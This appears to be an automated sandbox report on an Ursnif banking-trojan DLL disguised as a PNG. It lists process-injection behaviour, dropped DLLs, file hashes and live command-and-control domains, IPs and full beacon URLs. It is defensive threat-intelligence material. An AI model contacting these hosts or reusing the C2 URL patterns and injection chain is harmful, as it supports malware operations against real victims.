            behaviorgraph top1 signatures2 2 Behavior Graph ID: 539457 Sample: 6.png Startdate: 14/12/2021 Architecture: WINDOWS Score: 100 103 Found malware configuration 2->103 105 Yara detected  Ursnif 2->105 107 Machine Learning detection for sample 2->107 109 5 other signatures 2->109 9 loaddll32.exe 1 2->9         started        13 mshta.exe 2->13         started        15 mshta.exe 2->15         started        17 2 other processes 2->17 process3 dnsIp4 97 windows.update3.com 9->97 99 berukoneru.website 9->99 101 2 other IPs or domains 9->101 131 Writes to foreign memory regions 9->131 133 Writes or reads registry keys via WMI 9->133 135 Writes registry values via WMI 9->135 19 cmd.exe 1 9->19         started        21 regsvr32.exe 1 9->21         started        25 rundll32.exe 9->25         started        27 BackgroundTransferHost.exe 13 9->27         started        29 powershell.exe 13->29         started        32 powershell.exe 15->32         started        34 powershell.exe 17->34         started        36 powershell.exe 17->36         started        signatures5 process6 dnsIp7 38 rundll32.exe 19->38         started        83 berukoneru.website 79.110.52.144, 443, 49795, 49796 V4ESCROW-ASRO Romania 21->83 85 windows.update3.com 21->85 87 prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com 18.219.227.107, 443, 49772, 49773 AMAZON-02US United States 21->87 111 Writes to foreign memory regions 21->111 113 Writes or reads registry keys via WMI 21->113 115 Writes registry values via WMI 21->115 42 control.exe 21->42         started        89 windows.update3.com 25->89 117 System process connects to network (likely due to code injection or exploit) 25->117 44 control.exe 25->44         started        71 C:\Users\user\AppData\...\nigogz4l.cmdline, UTF-8 29->71 dropped 119 Modifies the context of a thread in another process (thread injection) 29->119 121 Maps a DLL or memory area into another process 29->121 123 Creates a thread in another existing process (thread injection) 29->123 46 csc.exe 29->46         started        53 2 other processes 29->53 49 csc.exe 32->49         started        51 conhost.exe 32->51         started        55 2 other processes 34->55 57 2 other processes 36->57 file8 signatures9 process10 dnsIp11 91 3.12.124.139, 443, 49775, 49778 AMAZON-02US United States 38->91 93 windows.update3.com 38->93 95 2 other IPs or domains 38->95 125 System process connects to network (likely due to code injection or exploit) 38->125 127 Writes to foreign memory regions 38->127 129 Writes registry values via WMI 38->129 59 control.exe 38->59         started        73 C:\Users\user\AppData\Local\...\nigogz4l.dll, PE32 46->73 dropped 61 cvtres.exe 46->61         started        75 C:\Users\user\AppData\Local\...\nlbomp32.dll, PE32 49->75 dropped 63 cvtres.exe 49->63         started        77 C:\Users\user\AppData\Local\...\dtnsoflb.dll, PE32 53->77 dropped 79 C:\Users\user\AppData\Local\...\uu5u2nmv.dll, PE32 55->79 dropped 65 cvtres.exe 55->65         started        81 C:\Users\user\AppData\Local\...\wklr4juq.dll, PE32 57->81 dropped 67 cvtres.exe 57->67         started        file12 signatures13 process14 process15 69 rundll32.exe 59->69         started       

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            6.dll100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            4.2.rundll32.exe.f10000.1.unpack100%AviraHEUR/AGEN.1108168Download File

            Domains

            SourceDetectionScannerLabelLink
            windows.update3.com0%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            https://berukoneru.website/tire/5Dw6h1nh0yZR8l/CEdpvqzTXmbvA8zN38_2F/HfVXZtPlGclvWlY_/2F2pmmVAx7s9on0%Avira URL Cloudsafe
            http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
            https://berukoneru.website/tyi0%Avira URL Cloudsafe
            https://berukoneru.website/tire/cFJsSWAGWE/z2qui_2Bz1BNPPVC8/40cjfJwuY_2F/qeMRrcIZBVG/Ne0YpnkwEJfIh3/f5okxbrq_2FXxzqJmpSlY/lBFuBWEAi70a61Vy/5QzGUBrPY97n5jQ/Uty84umyFnIA829ewc/61TtijfTY/zF0ZOoxI3N5pWHzggULR/QMXY_2F7FMDggc4thO7/G_2BQV4WNp08p5XmI0/TT.eta0%Avira URL Cloudsafe
            http://constitution.org/usdeclar.txtC:0%URL Reputationsafe
            https://windows.update3.com/0%Avira URL Cloudsafe
            http://https://file://USER.ID%lu.exe/upd0%Avira URL Cloudsafe
            https://berukoneru.website:443/tire/iL5Q0EgKDzXlIJvSVY9Fa72/roFEnyYEEO/BTl6hhjqhLPztNm87/ClBTSTJ24YQ0%Avira URL Cloudsafe
            https://assets.onestore.ms/cdnfiles/onestorerolling-1605-16000/shell/common/respond-proxy.html0%Avira URL Cloudsafe
            https://berukoneru.website/tire/BkVC2TYPKwX7I/d18vbD7j/LfTctW1YFOCxVg72R7OOyCe/FNM87YiO3R/kqhypryuHY0%Avira URL Cloudsafe
            https://berukoneru.website/tire/xfoS5YiSnq/LOnpfmnBMaAwxRNJT/gKlVrjFyFJq8/T2InmpA9wuO/M0panYR_2BpfjL/QVPhPbWeSwRVFSzMJ6Vcg/Y9VyT4fbhoZ82vwq/2GIivBsbax9rQUh/n7Uc5KQo0J8ysVLUlr/XSTAmgKJY/zcSJprSz5_2F2B_2Bsbt/2juDsOXqzjP5XLZ_2FP/WpBTOnAHWcoi3w7ov9P0p8/2Wzq8vdJF/5Vrog3ES/Q.eta0%Avira URL Cloudsafe
            https://windows.update3.com/tire/h5hri2qU3j_2/FtKGoeU1cGb/_2B9_2FVlXXJXe/pIon3PPVjwV3l856n6O1d/JfgtT0%Avira URL Cloudsafe
            https://berukoneru.website/0%Avira URL Cloudsafe
            http://constitution.org/usdeclar.txt0%URL Reputationsafe
            https://berukoneru.website/O0%Avira URL Cloudsafe
            https://berukoneru.website/BS0%Avira URL Cloudsafe
            https://berukoneru.website/tire/5Dw6h1nh0yZR8l/CEdpvqzTXmbvA8zN38_2F/HfVXZtPlGclvWlY_/2F2pmmVAx7s9onw/Df8mv9bGmzrCq_2BDh/Avhzr_2BW/zhUOFRSj_2Brp9dFi25e/XIimtsTVgbS8Ddk4Jlg/q7ifDAWTLXmxh8fPSAYnUc/3K8xDlQvgKVYD/9E1TEXJC/aPKjFJSRgVkfUwKBYWKDgLh/VONwiC9wK5/3CPG7RAhZST/_2FDfWf.eta0%Avira URL Cloudsafe
            https://berukoneru.website/tire/9IgUYNG9/P9N8jGg62VAhbwmUeolHFCg/K1HN9iUPdi/an2HdiNP_2FRIROSF/l9uR7XFSquKc/cTL90RaThvy/4LigE_2BC67Pa2/OL_2Fq6LzSFfAjBrcF1my/5AUpi_2BYfx15AAS/Ho8688ZDo7zPK6r/e_2F4ZPz87sJSle6kT/I1gJ4hikp/cCibgdVeBM9n2ccXEO18/D4MJBqmD.eta0%Avira URL Cloudsafe
            https://berukoneru.website/j0%Avira URL Cloudsafe
            https://berukoneru.website:443/tire/gAFUHu83b7fr5ftbr5O9tX/NNJYheBEZ_2Bt/wXhf6hyZ/iBEWHVb19RFKuDukD60%Avira URL Cloudsafe
            https://berukoneru.website/tire/4rLoqSurzyu0/faIn56YEFho/0rtfGJwOQq2F5c/BJoAXiIiU_2F9ZRU2hBse/gAViRvyFsSwGVefa/kRvG3X29VJojGH9/HHkJOTdVe7Nqn26zmq/y4GSGdPZu/kOhHaVJwE10tGTyVEPor/Cm7rt8Rg13eBm6Sc7Sm/5BVZ_2BPytM06u32e6Y8Q1/6dRgyXIz2yrBpW/dgW2i.eta0%Avira URL Cloudsafe
            https://nodejs.org00%Avira URL Cloudsafe
            https://berukoneru.website/tire/iH0556GjtiGQk4lyd6/e4eJ66Hyx/L2n2id7yGxzkaZSAZenq/25xy0D1xFkintWrbCA0%Avira URL Cloudsafe
            https://berukoneru.website/tire/xfoS5YiSnq/LOnpfmnBMaAwxRNJT/gKlVrjFyFJq8/T2InmpA9wuO/M0panYR_2BpfjL0%Avira URL Cloudsafe
            https://berukoneru.website/tire/iL5Q0EgKDzXlIJvSVY9Fa72/roFEnyYEEO/BTl6hhjqhLPztNm87/ClBTSTJ24YQi/659nN8frXqL/KI_2BmGQcF3l8a/UPJEdWRElF2Ck7h3GrI7f/Jn4UaIHKOCKly3pR/5WtUgfhtCob3WA8/8RFl0SkPd8NK0tapfV/Bv03ARxcw/T6wxTs3S_2BFMRgrZw2Q/_2BV_2F7vXjmj/i.eta0%Avira URL Cloudsafe
            https://windows.update3.com/tire/clW2f_2FhATNrnqvBey5XJ/HMTv6hdufnhb6/_2BVSemT/sKeyn9puL2fpAeyTFFwZv0%Avira URL Cloudsafe
            https://berukoneru.website/tire/iL5Q0EgKDzXlIJvSVY9Fa72/roFEnyYEEO/BTl6hhjqhLPztNm87/ClBTSTJ24YQi/650%Avira URL Cloudsafe
            https://berukoneru.website/jP0%Avira URL Cloudsafe
            https://berukoneru.website/tire/BkVC2TYPKwX7I/d18vbD7j/LfTctW1YFOCxVg72R7OOyCe/FNM87YiO3R/kqhypryuHYA4xvaox/Zos6wfhvU6Vx/dZ_2FhTkVUm/dQ1eWiBdVQx_2F/3MQ4AfN6CRhAz7ojdkAuB/vyHN6D_2BnDaccRD/rxLm6HRGflkJaqH/HtsgyaJ8NMuefJHJTr/vf407nMOm/3YNEpWUoxMPlA61ciEA5/ZB4w8oLbC0y/cC.eta0%Avira URL Cloudsafe
            https://berukoneru.website/LAp0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com
            		18.219.227.107
            		truefalse
              		high
              berukoneru.website
              		79.110.52.144
              		truetrue
                		unknown
                windows.update3.com
                		unknown
                		unknowntrueunknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                https://berukoneru.website/tire/cFJsSWAGWE/z2qui_2Bz1BNPPVC8/40cjfJwuY_2F/qeMRrcIZBVG/Ne0YpnkwEJfIh3/f5okxbrq_2FXxzqJmpSlY/lBFuBWEAi70a61Vy/5QzGUBrPY97n5jQ/Uty84umyFnIA829ewc/61TtijfTY/zF0ZOoxI3N5pWHzggULR/QMXY_2F7FMDggc4thO7/G_2BQV4WNp08p5XmI0/TT.etatrue
                • Avira URL Cloud: safe
                		unknown
                https://berukoneru.website/tire/xfoS5YiSnq/LOnpfmnBMaAwxRNJT/gKlVrjFyFJq8/T2InmpA9wuO/M0panYR_2BpfjL/QVPhPbWeSwRVFSzMJ6Vcg/Y9VyT4fbhoZ82vwq/2GIivBsbax9rQUh/n7Uc5KQo0J8ysVLUlr/XSTAmgKJY/zcSJprSz5_2F2B_2Bsbt/2juDsOXqzjP5XLZ_2FP/WpBTOnAHWcoi3w7ov9P0p8/2Wzq8vdJF/5Vrog3ES/Q.etatrue
                • Avira URL Cloud: safe
                		unknown
                https://berukoneru.website/tire/5Dw6h1nh0yZR8l/CEdpvqzTXmbvA8zN38_2F/HfVXZtPlGclvWlY_/2F2pmmVAx7s9onw/Df8mv9bGmzrCq_2BDh/Avhzr_2BW/zhUOFRSj_2Brp9dFi25e/XIimtsTVgbS8Ddk4Jlg/q7ifDAWTLXmxh8fPSAYnUc/3K8xDlQvgKVYD/9E1TEXJC/aPKjFJSRgVkfUwKBYWKDgLh/VONwiC9wK5/3CPG7RAhZST/_2FDfWf.etatrue
                • Avira URL Cloud: safe
                		unknown
                https://berukoneru.website/tire/9IgUYNG9/P9N8jGg62VAhbwmUeolHFCg/K1HN9iUPdi/an2HdiNP_2FRIROSF/l9uR7XFSquKc/cTL90RaThvy/4LigE_2BC67Pa2/OL_2Fq6LzSFfAjBrcF1my/5AUpi_2BYfx15AAS/Ho8688ZDo7zPK6r/e_2F4ZPz87sJSle6kT/I1gJ4hikp/cCibgdVeBM9n2ccXEO18/D4MJBqmD.etatrue
                • Avira URL Cloud: safe
                		unknown
                https://berukoneru.website/tire/4rLoqSurzyu0/faIn56YEFho/0rtfGJwOQq2F5c/BJoAXiIiU_2F9ZRU2hBse/gAViRvyFsSwGVefa/kRvG3X29VJojGH9/HHkJOTdVe7Nqn26zmq/y4GSGdPZu/kOhHaVJwE10tGTyVEPor/Cm7rt8Rg13eBm6Sc7Sm/5BVZ_2BPytM06u32e6Y8Q1/6dRgyXIz2yrBpW/dgW2i.etatrue
                • Avira URL Cloud: safe
                		unknown
                https://berukoneru.website/tire/iL5Q0EgKDzXlIJvSVY9Fa72/roFEnyYEEO/BTl6hhjqhLPztNm87/ClBTSTJ24YQi/659nN8frXqL/KI_2BmGQcF3l8a/UPJEdWRElF2Ck7h3GrI7f/Jn4UaIHKOCKly3pR/5WtUgfhtCob3WA8/8RFl0SkPd8NK0tapfV/Bv03ARxcw/T6wxTs3S_2BFMRgrZw2Q/_2BV_2F7vXjmj/i.etatrue
                • Avira URL Cloud: safe
                		unknown
                https://berukoneru.website/tire/BkVC2TYPKwX7I/d18vbD7j/LfTctW1YFOCxVg72R7OOyCe/FNM87YiO3R/kqhypryuHYA4xvaox/Zos6wfhvU6Vx/dZ_2FhTkVUm/dQ1eWiBdVQx_2F/3MQ4AfN6CRhAz7ojdkAuB/vyHN6D_2BnDaccRD/rxLm6HRGflkJaqH/HtsgyaJ8NMuefJHJTr/vf407nMOm/3YNEpWUoxMPlA61ciEA5/ZB4w8oLbC0y/cC.etatrue
                • Avira URL Cloud: safe
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                https://aka.ms/MicrosoftEdgeDownload&quot;loaddll32.exe, 00000000.00000003.317624845.0000000001398000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.316267329.00000000033D1000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.316701420.00000000008F1000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.316654509.0000000000FFE000.00000004.00000001.sdmpfalse
                  		high
                  https://berukoneru.website/tire/5Dw6h1nh0yZR8l/CEdpvqzTXmbvA8zN38_2F/HfVXZtPlGclvWlY_/2F2pmmVAx7s9onregsvr32.exe, 00000002.00000003.362160768.00000000033C0000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000018.00000003.396802391.000001497A5C1000.00000004.00000001.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://berukoneru.website/tyirundll32.exe, 00000003.00000003.362882057.00000000008D7000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000018.00000003.396802391.000001497A5C1000.00000004.00000001.sdmpfalse
                    		high
                    http://constitution.org/usdeclar.txtC:loaddll32.exe, 00000000.00000003.434428828.0000000004A88000.00000004.00000040.sdmp, regsvr32.exe, 00000002.00000003.418338276.0000000006518000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.418329153.0000000005C78000.00000004.00000040.sdmp, rundll32.exe, 00000004.00000003.418350281.0000000006148000.00000004.00000040.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://windows.update3.com/regsvr32.exe, 00000002.00000003.363867556.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.372687409.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.362364384.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.361019833.0000000003383000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.361512151.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.362934990.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.362827191.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.364485968.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.372692121.0000000000F9E000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://https://file://USER.ID%lu.exe/updloaddll32.exe, 00000000.00000003.434428828.0000000004A88000.00000004.00000040.sdmp, regsvr32.exe, 00000002.00000003.418338276.0000000006518000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.418329153.0000000005C78000.00000004.00000040.sdmp, rundll32.exe, 00000004.00000003.418350281.0000000006148000.00000004.00000040.sdmpfalse
                    • Avira URL Cloud: safe
                    		low
                    https://berukoneru.website:443/tire/iL5Q0EgKDzXlIJvSVY9Fa72/roFEnyYEEO/BTl6hhjqhLPztNm87/ClBTSTJ24YQregsvr32.exe, 00000002.00000003.522837252.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.363867556.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.372687409.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.419406202.000000000336B000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.jsloaddll32.exe, 00000000.00000003.317582164.000000000139F000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.317644552.00000000013B1000.00000004.00000001.sdmpfalse
                      		high
                      https://assets.onestore.ms/cdnfiles/onestorerolling-1605-16000/shell/common/respond-proxy.htmlrundll32.exe, 00000004.00000003.338607112.0000000000FF3000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://github.com/Pester/Pesterpowershell.exe, 00000018.00000003.396802391.000001497A5C1000.00000004.00000001.sdmpfalse
                        		high
                        https://berukoneru.website/tire/BkVC2TYPKwX7I/d18vbD7j/LfTctW1YFOCxVg72R7OOyCe/FNM87YiO3R/kqhypryuHYrundll32.exe, 00000004.00000003.365155224.0000000000FF2000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://windows.update3.com/tire/h5hri2qU3j_2/FtKGoeU1cGb/_2B9_2FVlXXJXe/pIon3PPVjwV3l856n6O1d/JfgtTrundll32.exe, 00000004.00000003.361512151.0000000000F9E000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://berukoneru.website/rundll32.exe, 00000003.00000003.364039010.00000000008D7000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.372813489.00000000008D7000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.523369955.00000000008D7000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000002.914075643.0000000000F3A000.00000004.00000020.sdmp, rundll32.exe, 00000004.00000003.364485968.0000000000F9E000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://constitution.org/usdeclar.txtloaddll32.exe, 00000000.00000003.434428828.0000000004A88000.00000004.00000040.sdmp, regsvr32.exe, 00000002.00000003.418338276.0000000006518000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.418329153.0000000005C78000.00000004.00000040.sdmp, rundll32.exe, 00000004.00000003.418350281.0000000006148000.00000004.00000040.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://berukoneru.website/Orundll32.exe, 00000004.00000003.362934990.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.362827191.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.522837424.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.372692121.0000000000F9E000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://berukoneru.website/BSregsvr32.exe, 00000002.00000003.372687409.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.372837778.00000000033C0000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://berukoneru.website/jregsvr32.exe, 00000002.00000003.362364384.000000000336B000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://berukoneru.website:443/tire/gAFUHu83b7fr5ftbr5O9tX/NNJYheBEZ_2Bt/wXhf6hyZ/iBEWHVb19RFKuDukD6rundll32.exe, 00000004.00000003.372839349.0000000000FF2000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.372692121.0000000000F9E000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://nodejs.org06.dllfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://berukoneru.website/tire/iH0556GjtiGQk4lyd6/e4eJ66Hyx/L2n2id7yGxzkaZSAZenq/25xy0D1xFkintWrbCAloaddll32.exe, 00000000.00000003.372896811.0000000001341000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://berukoneru.website/tire/xfoS5YiSnq/LOnpfmnBMaAwxRNJT/gKlVrjFyFJq8/T2InmpA9wuO/M0panYR_2BpfjLregsvr32.exe, 00000002.00000003.372829342.000000000335B000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://windows.update3.com/tire/clW2f_2FhATNrnqvBey5XJ/HMTv6hdufnhb6/_2BVSemT/sKeyn9puL2fpAeyTFFwZvregsvr32.exe, 00000002.00000003.361178760.000000000335B000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://berukoneru.website/tire/iL5Q0EgKDzXlIJvSVY9Fa72/roFEnyYEEO/BTl6hhjqhLPztNm87/ClBTSTJ24YQi/65regsvr32.exe, 00000002.00000003.362615512.00000000033C1000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.372837778.00000000033C0000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.419406202.000000000336B000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://berukoneru.website/jPregsvr32.exe, 00000002.00000003.522837252.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.363514151.00000000033C1000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.372687409.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.372837778.00000000033C0000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.419406202.000000000336B000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://berukoneru.website/LAprundll32.exe, 00000004.00000002.914075643.0000000000F3A000.00000004.00000020.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown

                        Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public

                        IPDomainCountryFlagASNASN NameMalicious
                        79.110.52.144
                        		berukoneru.websiteRomania
                        		60233V4ESCROW-ASROtrue
                        18.219.227.107
                        		prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.comUnited States
                        		16509AMAZON-02USfalse
                        3.12.124.139
                        		unknownUnited States
                        		16509AMAZON-02UStrue

                        Private

                        IP
                        192.168.2.1

                        General Information

                        Joe Sandbox Version:34.0.0 Boulder Opal
                        Analysis ID:539457
                        Start date:14.12.2021
                        Start time:10:32:11
                        Joe Sandbox Product:CloudBasic
                        Overall analysis duration:0h 14m 6s
                        Hypervisor based Inspection enabled:false
                        Report type:light
                        Sample file name:6.png (renamed file extension from png to dll)
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                        Number of analysed new started processes analysed:50
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Detection:MAL
                        Classification:mal100.troj.evad.winDLL@59/52@16/4
                        EGA Information:Failed
                        HDC Information:
                        • Successful, ratio: 90.2% (good quality ratio 86.1%)
                        • Quality average: 78.9%
                        • Quality standard deviation: 28.8%
                        HCA Information:
                        • Successful, ratio: 100%
                        • Number of executed functions: 0
                        • Number of non-executed functions: 0
                        Cookbook Comments:
                        • Adjust boot time
                        • Enable AMSI
                        • Override analysis time to 240s for rundll32
                        Warnings:
                        Show All
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                        • TCP Packets have been reduced to 100
                        • Excluded IPs from analysis (whitelisted): 104.215.148.63, 40.76.4.15, 40.112.72.205, 40.113.200.201, 13.77.161.179, 2.20.205.172
                        • Excluded domains from analysis (whitelisted): assets.msn.com, client.wns.windows.com, www.microsoft.com-c-3.edgekey.net, fs.microsoft.com, store-images.s-microsoft.com, e13678.dscb.akamaiedge.net, img-prod-cms-rt-microsoft-com.akamaized.net, microsoft.com, arc.msn.com, www.microsoft.com, www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Report size getting too big, too many NtReadVirtualMemory calls found.

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        10:33:33API Interceptor6x Sleep call for process: regsvr32.exe modified
                        10:33:33API Interceptor11x Sleep call for process: rundll32.exe modified
                        10:33:46API Interceptor5x Sleep call for process: loaddll32.exe modified
                        10:34:20API Interceptor248x Sleep call for process: powershell.exe modified

                        Joe Sandbox View / Context

                        IPs

                        No context

                        Domains

                        No context

                        ASN

                        No context

                        JA3 Fingerprints

                        No context

                        Dropped Files

                        No context

                        Created / dropped Files

                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):11606
                        Entropy (8bit):4.883977562702998
                        Encrypted:false
                        SSDEEP:192:Axoe5FpOMxoe5Pib4GVsm5emdKVFn3eGOVpN6K3bkkjo5HgkjDt4iWN3yBGHh9sO:6fib4GGVoGIpN6KQkj2Akjh4iUxs14fr
                        MD5:1F1446CE05A385817C3EF20CBD8B6E6A
                        SHA1:1E4B1EE5EFCA361C9FB5DC286DD7A99DEA31F33D
                        SHA-256:2BCEC12B7B67668569124FED0E0CEF2C1505B742F7AE2CF86C8544D07D59F2CE
                        SHA-512:252AD962C0E8023419D756A11F0DDF2622F71CBC9DAE31DC14D9C400607DF43030E90BCFBF2EE9B89782CC952E8FB2DADD7BDBBA3D31E33DA5A589A76B87C514
                        Malicious:false
                        Preview: PSMODULECACHE......P.e...S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........7r8...C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1192
                        Entropy (8bit):5.325275554903011
                        Encrypted:false
                        SSDEEP:24:3aEPpQrLAo4KAxX5qRPD42HOoFe9t4CvKuKnKJJx5:qEPerB4nqRL/HvFe9t4Cv94ar5
                        MD5:05CF074042A017A42C1877FC5DB819AB
                        SHA1:5AF2016605B06ECE0BFB3916A9480D6042355188
                        SHA-256:971C67A02609B2B561618099F48D245EA4EB689C6E9F85232158E74269CAA650
                        SHA-512:96C1C1624BB50EC8A7222E4DD21877C3F4A4D03ACF15383E9CE41070C194A171B904E3BF568D8B2B7993EADE0259E65ED2E3C109FD062D94839D48DFF041439A
                        Malicious:false
                        Preview: @...e................................................@..........8................'....L..}............System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.AutomationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServices4................Zg5..:O..g..q..........System.Xml..4...............T..'Z..N..Nvj.G.........System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<...............)L..Pz.O.E.R............System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                        C:\Users\user\AppData\Local\Temp\RES11BF.tmp
                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                        File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols
                        Category:dropped
                        Size (bytes):1328
                        Entropy (8bit):3.9923065968914804
                        Encrypted:false
                        SSDEEP:24:HCe9E26c3tuHrhKdNII+ycuZhNqlcakS7lxPNnq9qd:8c3tuVKdu1ulqaa37Bq9K
                        MD5:27C528436B2B3C05916BE7800A1BDCA3
                        SHA1:26B8F391092F85DDFD9F5820E91C7EEA36070D53
                        SHA-256:608F560F77DFA1AC315ABF79CE35E71EBD5E090F1E1335C5E6B4E38995128647
